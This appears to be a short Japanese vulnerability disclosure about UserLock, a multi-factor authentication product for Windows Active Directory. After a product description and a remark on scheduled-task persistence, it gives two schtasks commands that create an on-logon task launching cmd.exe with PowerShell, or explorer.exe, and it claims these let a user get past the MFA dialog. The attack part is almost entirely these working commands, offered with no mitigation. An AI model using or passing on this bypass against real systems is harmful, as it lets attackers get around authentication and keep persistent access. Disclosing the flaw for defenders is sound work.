
説明: Userlockは、Windows Active Directoryおよびクラウド環境向けの多要素認証ソリューションであり、不正かつ望ましくないアクセスを阻止します。Windowsログオン、リモートデスクトップ(RDPおよびRD Gateway)、IIS、VPN、クラウドアプリケーション上で、カスタマイズされた二要素認証(2FA)を実現します。Userlockを使用すると、Active Directoryログオン、ドメイン参加済みのワークステーションおよびサーバーにMFAを実装できます。その日の最初のワークステーションへのログオン時に、AuthenticatorアプリのOTPコードを入力できるダイアログボックスが表示されます。Userlockはログオンプロセスと統合して、二要素認証を提供します。
脅威アクターが被害者のコンピューター上で永続性を確立するために最も一般的に悪用される戦略の1つは、タスクスケジューリングです。攻撃者はこの戦略を頻繁に使用して、自動検出を回避し、永続性を維持し、長期間潜伏した後に奇襲攻撃を実行します。
脆弱性:
任意のユーザーのログオン後に実行されるスケジュールタスクを作成します。
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

ドメイン資格情報でのログオンに成功すると、スケジュールされたcmd.exeにUserlock MFAダイアログボックスが表示されます。
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"